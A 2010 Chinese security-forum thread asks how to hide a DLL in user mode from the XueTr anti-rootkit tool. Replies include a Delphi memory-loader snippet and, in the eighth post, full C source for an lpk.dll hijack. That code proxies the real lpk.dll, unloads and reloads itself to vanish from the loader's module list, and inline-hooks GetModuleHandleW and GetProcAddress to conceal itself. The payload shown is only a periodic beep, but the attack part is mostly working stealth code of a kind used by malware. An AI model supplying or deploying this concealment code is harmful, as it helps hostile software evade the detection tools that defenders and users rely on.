[讨论]r3隐藏dll,xuetr看不见?-编程技术-看雪-安全社区|安全招聘|kanxue.com

[讨论]r3隐藏dll,xuetr看不见?

发表于: 2010-11-27 13:05 11274

[讨论]r3隐藏dll,xuetr看不见?

AsmBrat

2010-11-27 13:05

11274

求思路?
见过实现的, 但是dllmain里加了vmp 不好扣.

[注意]看雪招聘，专注安全领域的专业人才平台！

收藏・4

免费

支持

最新回复 (9)

lovehuaibb

雪币： 203

活跃值： (10)

能力值：

( LV2，RANK：10 )

在线值：

发帖

回帖

粉丝

关注

私信

lovehuaibb: 2 楼

Memory Loader 可以让xuetr看不到模块其他方法没玩过
Delphi代码
单元 http://www.2ccc.com/article.asp?articleid=5784

var
  Buf:array [1..256] of Char;
  Load:TMemoryStream;
begin
 GetModuleFileNameA(HInstance, @Buf, SizeOf(Buf));
 if Pos('.', Buf) > 0 then
 begin
    Load := TMemoryStream.Create;
    Load.LoadFromFile(Buf);  
    memLoadLibrary(Load.Memory);
    Load.Free;
    FreeLibraryAndExitThread(HInstance, 0); 
 end else begin
  // 你想干啥干啥
 end;
end.

2010-11-27 19:09

AsmBrat

雪币： 6

活跃值： (10)

能力值：

( LV2，RANK：10 )

在线值：

发帖

回帖

粉丝

关注

私信

AsmBrat: 3 楼

[QUOTE=lovehuaibb;895779]Memory Loader 可以让xuetr看不到模块其他方法没玩过
Delphi代码
单元 http://www.2ccc.com/article.asp?articleid=5784

var
Buf:array [1..256] of Char;
Load:TMemory...[/QUOTE]
不好意思啊楼上的我要说一下, 必须是排除了自己实现load pe的方法.
因为我见的样本里,他直接调用了loadlibrary, 所以我可以确定他是在r3下就隐藏了自身.而没有调用peload的方法

2010-11-27 23:20

Mxixihaha

雪币： 4960

活跃值： (4903)

能力值：

( LV2，RANK：10 )

在线值：

发帖

回帖

598

粉丝

关注

私信

Mxixihaha: 4 楼

你很有可能见到的是驱动级的吧...只是驱动是用DLL资源写出来的.

BOOL WINAPI DllMain(
  HINSTANCE hinstDLL,  // handle to the DLL module
  DWORD fdwReason,    // reason for calling function
  LPVOID lpvReserved // reserved
)
{
if(fdwReason==DLL_PROCESS_ATTACH)
{
   //释放驱动
//加载驱动
//驱动隐藏
}
}
........................

2010-11-28 19:00

AsmBrat

雪币： 6

活跃值： (10)

能力值：

( LV2，RANK：10 )

在线值：

发帖

回帖

粉丝

关注

私信

AsmBrat: 5 楼

楼上的大哥, 我已经说明的很清楚了鸟. 是纯ring3下执行的.

2010-11-28 22:54

gezz

雪币： 88

活跃值： (11)

能力值：

( LV2，RANK：10 )

在线值：

发帖

回帖

186

粉丝

关注

私信

gezz: 6 楼

MARK 下一直关注ING

2010-11-29 01:26

AsmBrat

雪币： 6

活跃值： (10)

能力值：

( LV2，RANK：10 )

在线值：

发帖

回帖

粉丝

关注

私信

AsmBrat: 7 楼

手上已经有已知的方法可以做到了不过还是期待有高手能够透漏下.

2010-11-29 02:33

loqich

雪币： 952

活跃值： (2006)

能力值：

( LV2，RANK：10 )

在线值：

发帖

回帖

643

粉丝

关注

私信

loqich: 8 楼

以前写的lpk 代码是测试用的很乱方法很多地方都有说的我的代码也是东抄西抄来的

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

294

295

296

297

298

299

300

301

302

303

304

305

306

307

308

309

310

311

312

313

314

315

316

317

318

319

320

321

322

323

324

325

326

327

328

329

330

331

332

333

334

335

336

337

338

339

340

341

342

343

344

345

346

347

348

349

350

351

352

353

354

355

356

357

358

359

360

361

362

363

364

365

366

367

368

369

370

371

372

373

374

375

376

377

378

379

380

381

382

383

384

385

386

387

388

389

390

391

392

393

394

395

396

397

398

399

400

401

402

403

404

405

406

407

408

409

410

411

412

413

414

415

416

417

418

419

420

421

422

423

424

425

426

427

428

429

430

431

432

433

434

435

436

437

438

439

440

441

442

443

444

445

446

447

448

449

450

451

452

453

454

455

456

457

458

459

460

461

462

463

464

465

466

467

468

469

470

471

472

473

474

475

476

477

478

479

480

481

482

483

484

485

486

487

488

489

490

491

492

493

494

495

496

497

498

499

500

501

502

503

504

505

506

507

508

509

510

511

512

513

514

515

516

517

518

519

520

521

522

523

524

525

526

527

528

529

530

531

532

533

534

535

536

537

538

539

540

541

542

543

544

545

546

547

548

549

550

551

552

553

554

555

556

#define _WIN32_WINNT 0x0501
 
#include <windows.h>
#include <stdio.h>
#include <psapi.h>
#include <tchar.h>
#include <ImageHlp.h>
#pragma comment(linker, "/SECTION:.text,REW" ) //设PE节：.text,可读可执行
//#pragma comment(linker, "/entry:DllMain")
 
typedef void  (__stdcall  * MYAPI)();
 
 
 
#pragma comment(lib, "Psapi.lib")
#pragma comment(lib, "ImageHlp.lib")
 
HMODULE lpk_module = NULL;
HMODULE g_module = NULL;
BOOL    g_bInit = FALSE;
 
 
typedef struct _UNICODE_STRING 
{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
 
typedef struct _PEB_LDR_DATA
{
    ULONG Length;
    BOOLEAN Initialized;
    PVOID SsHandle; 
    LIST_ENTRY InLoadOrderModuleList;
    LIST_ENTRY InMemoryOrderModuleList; 
    LIST_ENTRY InInitializationOrderModuleList;
} PEB_LDR_DATA,*PPEB_LDR_DATA; 
 
 
typedef struct _LDR_MODULE
{
    LIST_ENTRY          InLoadOrderModuleList;
    LIST_ENTRY          InMemoryOrderModuleList;  
    LIST_ENTRY          InInitializationOrderModuleList; 
    void*               BaseAddress;  
    void*               EntryPoint;   
    ULONG               SizeOfImage;
    UNICODE_STRING      FullDllName;
    UNICODE_STRING      BaseDllName;
    ULONG               Flags;
    SHORT               LoadCount;
    SHORT               TlsIndex;
    HANDLE              SectionHandle;
    ULONG               CheckSum;
    ULONG               TimeDateStamp;
} LDR_MODULE, *PLDR_MODULE;
 
void ApiInit();
 
MYAPI pLpkInitialize;
MYAPI pLpkTabbedTextOut;
MYAPI pLpkDllInitialize;
MYAPI pLpkDrawTextEx;
MYAPI pLpkEditControl;
MYAPI pLpkExtTextOut;
MYAPI pLpkGetCharacterPlacement;
MYAPI pLpkGetTextExtentExPoint;
MYAPI pLpkPSMTextOut;
MYAPI pLpkUseGDIWidthCache;
MYAPI pftsWordBreak;
 
 
 
 
void HideLibrary(HMODULE hModule, LPVOID pCallBackAddr, LPVOID lParam);
 
typedef struct
{
    HMODULE lpDllBase;
    LPVOID lpNewDllBase;
}UNLOADLIB_CALLBACK, *PUNLOADLIB_CALLBACK;
 
typedef
LPVOID WINAPI VIRTUALALLOC(
                           LPVOID lpAddress,
                           SIZE_T dwSize,
                           DWORD flAllocationType,
                           DWORD flProtect
                           );
 
 
typedef
BOOL WINAPI HEAPDESTROY(
                        HANDLE hHeap
                        );
 
typedef BOOL WINAPI FREELIBRARY(
            HMODULE hLibModule
            );
 
 
typedef void *    __cdecl MEMCPY(void *, const void *, size_t);
 
 
DWORD WINAPI xThread(LPVOID lParam)
{
    while (TRUE)
    {
        Sleep(10000);
        MessageBeep(MB_OK);
    //  MessageBox(NULL, "Test", "Test", MB_OK);
    }
}
 
DWORD WINAPI UnLoadLibrary(LPVOID lParam)
{
    //__asm INT 3
 
    BYTE HeapDestroy_HookCode_bak[4];
    BYTE HeapDestroy_HookCode[4] = "\xC2\x04\x00";//RETN 0004
    MODULEINFO modinfo;
    DWORD oldProtect;
 
    PUNLOADLIB_CALLBACK cbFunc = (PUNLOADLIB_CALLBACK)lParam;
 
    HMODULE hDllInstance = cbFunc->lpDllBase;
    char dllpath_bak[MAX_PATH];
 
    GetModuleFileName(hDllInstance, dllpath_bak, sizeof(dllpath_bak));
    GetModuleInformation(GetCurrentProcess(), hDllInstance, &modinfo, sizeof(MODULEINFO));
 
    //FreeLibrary之后原来存放api地址的内存也会被释放，
    //但是FreeLibrary之后还有些动作，趁现在还没free，关键API记下来
    VIRTUALALLOC *_VirtualAlloc = (VIRTUALALLOC*)
        GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualAlloc");
    MEMCPY         *_memcpy         = (MEMCPY*)
        GetProcAddress(GetModuleHandle("ntdll.dll"), "memcpy");
 
    FREELIBRARY         *_FreeLibrary         = (FREELIBRARY*)
        GetProcAddress(GetModuleHandle("kernel32.dll"), "FreeLibrary");
 
    //这个很关键，并不是我要调用，是 FreeLibrary 时系统会调用，我要hook它,
    //不能给系统破坏这个heap，否则之后的dll貌似能工作，
    //但却不能用new或malloc申请内存, VirtualAlloc可以代替之，
    //但如果改写好多代码是划不来的，况且一些代码不好改,如list<T>的push内部的new
 
    HEAPDESTROY *_HeapDestroy    = (HEAPDESTROY*)
        GetProcAddress(GetModuleHandle("kernel32.dll"), "HeapDestroy");
 
    VirtualProtect(_HeapDestroy, 3, PAGE_EXECUTE_READWRITE, &oldProtect);
 
    //修改第一条指令为直接返回
    _memcpy(HeapDestroy_HookCode_bak, _HeapDestroy, 3);
    _memcpy(_HeapDestroy, HeapDestroy_HookCode, 3);
 
 
    //Sleep(100);
    //终于到这里了~~~^_^!
    _FreeLibrary(hDllInstance);//释放
 
    //修复刚hook的函数
    _memcpy(_HeapDestroy, HeapDestroy_HookCode_bak, 3);
    //_memcpy(_RtlFreeHeap, RtlFreeHeap_HookCode_bak, 3);
 
    //在原来的dll基址申请同样大小的内存，并把之前的那份dll拷贝还原回去
    if(_VirtualAlloc(hDllInstance,
        modinfo.SizeOfImage,
        MEM_COMMIT|MEM_RESERVE,
        PAGE_EXECUTE_READWRITE) == NULL
        )
    {
        ExitProcess(0);
    }
 
    _memcpy(hDllInstance, cbFunc->lpNewDllBase, modinfo.SizeOfImage);
    return 0;
}
 
 
DWORD WINAPI HideLibrary02(HMODULE hMod)
{
    MODULEINFO modinfo;
    UNLOADLIB_CALLBACK cbFunc;
 
    cbFunc.lpDllBase = hMod;
    GetModuleInformation(GetCurrentProcess(), cbFunc.lpDllBase, &modinfo, sizeof(MODULEINFO));
 
    //申请一块和当前dll同样大小的内存
    cbFunc.lpNewDllBase = VirtualAlloc(NULL, modinfo.SizeOfImage, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
 
    if(cbFunc.lpNewDllBase == NULL)
        return FALSE;
 
    //给当前dll做份拷贝，复制所有数据到刚申请的内存，
    CopyMemory(cbFunc.lpNewDllBase, modinfo.lpBaseOfDll, modinfo.SizeOfImage);
 
    //计算在copy中UnLoadLibrary的地址,并另起线程到该地址执行
    void *pNewUnLoadLibrary = LPVOID((DWORD)cbFunc.lpNewDllBase + (DWORD)UnLoadLibrary - (DWORD)modinfo.lpBaseOfDll);
 
    __asm
    {
        lea     eax, cbFunc
        push    eax
        call    pNewUnLoadLibrary
    }
 
    VirtualFree(cbFunc.lpNewDllBase, 0, MEM_DECOMMIT);
 
    HANDLE hThread = CreateThread(0,0, xThread, NULL, 0, NULL);
    CloseHandle(hThread);
    return TRUE;
}
 
 
 
 
 
void Hide(HMODULE hMod)
{
    PLIST_ENTRY Head,Cur;
    PPEB_LDR_DATA ldr;
    PLDR_MODULE ldm;
    __asm
    {
        mov eax , fs:[0x30]
        mov ecx , [eax + 0x0c] //Ldr
        mov ldr , ecx
    }
    Head = &(ldr->InLoadOrderModuleList);
    Cur = Head->Flink;
    do
    {
        ldm = CONTAINING_RECORD( Cur, LDR_MODULE, InLoadOrderModuleList);
        if( hMod == ldm->BaseAddress)
        {
            /*
            ldm->InLoadOrderModuleList.Blink->Flink =
                ldm->InLoadOrderModuleList.Flink;
            ldm->InLoadOrderModuleList.Flink->Blink =
                ldm->InLoadOrderModuleList.Blink; 
            ldm->InInitializationOrderModuleList.Blink->Flink =
                ldm->InInitializationOrderModuleList.Flink;
            ldm->InInitializationOrderModuleList.Flink->Blink =
                ldm->InInitializationOrderModuleList.Blink;  
            ldm->InMemoryOrderModuleList.Blink->Flink =
                ldm->InMemoryOrderModuleList.Flink;
            ldm->InMemoryOrderModuleList.Flink->Blink =
                ldm->InMemoryOrderModuleList.Blink;
                */
            ldm->LoadCount = 1;      //  设置加载次数为1
            break;
        }
        Cur= Cur->Flink; 
    }while(Head != Cur);
 
    //FreeLibrary(hMod);
 
    HideLibrary02(g_module);
}
 
__declspec(naked) void LpkInitialize()
{
    __asm
    {
        pushfd
        cmp     g_bInit, 0
        jne     __init
        pushad
        call    ApiInit
        popad
__init:
        popfd
        jmp dword ptr [pLpkInitialize]
    }
}
 
__declspec(naked) void LpkDllInitialize()
{
    __asm
    {
        pushfd
        cmp     g_bInit, 0
        jne     __init
        pushad
        call    ApiInit
        popad
__init:
        popfd
        jmp dword ptr [pLpkDllInitialize]
    }
}
 
 
 
__declspec(naked) void LpkTabbedTextOut(){__asm jmp dword ptr [pLpkTabbedTextOut]}
 
__declspec(naked) void LpkDrawTextEx(){__asm jmp dword ptr [pLpkDrawTextEx]}
 
__declspec(naked) void LpkExtTextOut(){__asm jmp dword ptr [pLpkExtTextOut]}
__declspec(naked) void LpkGetCharacterPlacement(){__asm jmp dword ptr [pLpkGetCharacterPlacement]}
__declspec(naked) void LpkGetTextExtentExPoint(){__asm jmp dword ptr [pLpkGetTextExtentExPoint]}
__declspec(naked) void LpkPSMTextOut(){__asm jmp dword ptr [pLpkPSMTextOut]}
__declspec(naked) void LpkUseGDIWidthCache(){__asm jmp dword ptr [pLpkUseGDIWidthCache]}
__declspec(naked) void ftsWordBreak()
{
    __asm jmp dword ptr [pftsWordBreak]
    __asm nop
    __asm nop
    __asm nop
    __asm nop
}
 
__declspec(naked) void LpkEditControl()
{
    __asm nop
    __asm nop
    __asm nop
    __asm nop
 
    __asm nop
    __asm nop
    __asm nop
    __asm nop
 
    __asm nop
    __asm nop
    __asm nop
    __asm nop
 
    __asm nop
    __asm nop
    __asm nop
    __asm nop
 
    __asm nop
    __asm nop
    __asm nop
    __asm nop
 
    __asm nop
    __asm nop
    __asm nop
    __asm nop
 
    __asm nop
    __asm nop
    __asm nop
    __asm nop
 
    __asm nop
    __asm nop
    __asm nop
    __asm nop
 
    __asm nop
    __asm nop
    __asm nop
    __asm nop
 
    __asm nop
    __asm nop
    __asm nop
    __asm nop
 
    __asm nop
    __asm nop
    __asm nop
    __asm nop
 
    __asm nop
    __asm nop
    __asm nop
    __asm nop
 
    __asm nop
    __asm nop
    __asm nop
    __asm nop
 
    __asm nop
    __asm nop
    __asm nop
    __asm nop
 
    __asm nop
    __asm nop
    __asm nop
    __asm nop
 
    __asm _emit 0
    __asm _emit 0
    __asm _emit 0
    __asm _emit 0
}
 
 
FARPROC WINAPI MyGetProcAddress(HMODULE ModuleBase, PCHAR pFunctionName)
{
    FARPROC pFunctionAddress = NULL;
    __try
    {
        ULONG                size = 0;
        PIMAGE_EXPORT_DIRECTORY exports =(PIMAGE_EXPORT_DIRECTORY)ImageDirectoryEntryToData(ModuleBase, TRUE, IMAGE_DIRECTORY_ENTRY_EXPORT, &size);
        ULONG                addr = (ULONG)exports-(ULONG)ModuleBase;
        PULONG functions =(PULONG)((ULONG) ModuleBase + exports->AddressOfFunctions);
        PSHORT ordinals  =(PSHORT)((ULONG) ModuleBase + exports->AddressOfNameOrdinals);
        PULONG names    =(PULONG)((ULONG) ModuleBase + exports->AddressOfNames);
        ULONG  max_name  =exports->NumberOfNames;
        ULONG  max_func  =exports->NumberOfFunctions;
        ULONG i;
        for (i = 0; i < max_name; i++)
        {
            ULONG ord = ordinals[i];
            if(i >= max_name || ord >= max_func) 
            {
                return NULL;
            }
            if (functions[ord] < addr || functions[ord] >= addr + size)
            {
                if (strcmp((PCHAR) ModuleBase + names[i], pFunctionName)  == 0)
                {
                    pFunctionAddress =(FARPROC)((PCHAR)ModuleBase + functions[ord]);
                    break;
                }
            }
        }
    }
    __except(EXCEPTION_EXECUTE_HANDLER)
    {
        pFunctionAddress = NULL;
    }
 
    return pFunctionAddress;
}
 
 
DWORD       g_dwHookGetModuleHandleW = NULL;
 
__declspec(naked) HMODULE WINAPI _HookGetModuleHandleW(LPCWSTR lpModuleName)
{
    __asm
    {
        mov     edi, edi
        push    ebp
        mov     ebp, esp
        jmp     g_dwHookGetModuleHandleW
    }
}
 
HMODULE WINAPI HookGetModuleHandleW(LPCWSTR lpModuleName)
{
    if ( !lstrcmpiW(lpModuleName, L"lpk") || !lstrcmpiW(lpModuleName, L"lpk.dll") )
    {
        return lpk_module;
    }
    return _HookGetModuleHandleW(lpModuleName);
}
 
 
DWORD       g_dwHookGetProcAddress = NULL;
__declspec(naked) FARPROC WINAPI _HookGetProcAddress(HMODULE hModule, LPCSTR lpProcName)
{
    __asm
    {
        mov     edi, edi
        push    ebp
        mov     ebp, esp
        mov     eax, g_module
        cmp     eax, hModule
        jne     __exit
        mov     eax, lpk_module
        mov     hModule, eax
__exit:
        jmp     g_dwHookGetProcAddress
    }
}
 
void ApiInit()
{
    char reallpk[MAX_PATH]={0};
    g_module = GetModuleHandleA("lpk.dll");
 
    GetSystemDirectoryA((LPSTR)reallpk,MAX_PATH);
    strcat(reallpk,"\\lpk.dll");
    if(lpk_module=LoadLibraryA(reallpk))
    {
        pLpkInitialize = (MYAPI) GetProcAddress(lpk_module,"LpkInitialize");
        pLpkTabbedTextOut = (MYAPI) GetProcAddress(lpk_module,"LpkTabbedTextOut");
        pLpkDllInitialize = (MYAPI) GetProcAddress(lpk_module,"LpkDllInitialize");
        pLpkDrawTextEx = (MYAPI) GetProcAddress(lpk_module,"LpkDrawTextEx");
        pLpkExtTextOut = (MYAPI) GetProcAddress(lpk_module,"LpkExtTextOut");
        pLpkGetCharacterPlacement = (MYAPI) GetProcAddress(lpk_module,"LpkGetCharacterPlacement");
        pLpkEditControl = (MYAPI) GetProcAddress(lpk_module,"LpkEditControl");
        pLpkGetTextExtentExPoint = (MYAPI) GetProcAddress(lpk_module,"LpkGetTextExtentExPoint");
        pLpkPSMTextOut = (MYAPI) GetProcAddress(lpk_module,"LpkPSMTextOut");
        pLpkUseGDIWidthCache = (MYAPI) GetProcAddress(lpk_module,"LpkUseGDIWidthCache");
        pftsWordBreak = (MYAPI) GetProcAddress(lpk_module,"ftsWordBreak");
         
        CopyMemory((LPVOID)((DWORD)LpkEditControl-4),(PVOID)((DWORD)pLpkEditControl-4),0x44);
 
    }
    else
    {
        ExitProcess(0);
    }
 
    Hide(g_module);
     
 
    //Hide(g_module);
 
    HMODULE hMod = GetModuleHandleA("kernel32.dll");
    DWORD dwOld;
 
    g_dwHookGetModuleHandleW = (DWORD)MyGetProcAddress(hMod, "GetModuleHandleW");
    VirtualProtect((PVOID)g_dwHookGetModuleHandleW, 5, PAGE_EXECUTE_READWRITE, &dwOld);
    *(PBYTE)g_dwHookGetModuleHandleW = 0xE9;
    *(PDWORD)(g_dwHookGetModuleHandleW + 1) = (DWORD)HookGetModuleHandleW - g_dwHookGetModuleHandleW - 5;
    VirtualProtect((PVOID)g_dwHookGetModuleHandleW, 5, dwOld, &dwOld);
    g_dwHookGetModuleHandleW += 5;
 
 
    g_dwHookGetProcAddress = (DWORD)MyGetProcAddress(hMod, "GetProcAddress");
    VirtualProtect((PVOID)g_dwHookGetProcAddress, 5, PAGE_EXECUTE_READWRITE, &dwOld);
    *(PBYTE)g_dwHookGetProcAddress = 0xE9;
    *(PDWORD)(g_dwHookGetProcAddress + 1) = (DWORD)_HookGetProcAddress - g_dwHookGetProcAddress - 5;
    VirtualProtect((PVOID)g_dwHookGetProcAddress, 5, dwOld, &dwOld);
    g_dwHookGetProcAddress += 5;
 
    g_bInit = TRUE;
}
 
 
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    HMODULE hMod = NULL; 
    switch(ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        if ( !g_bInit )
        {
            ApiInit();
        }
        break;
    case DLL_PROCESS_DETACH:
         
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
 
        break;
    }
    return TRUE;
}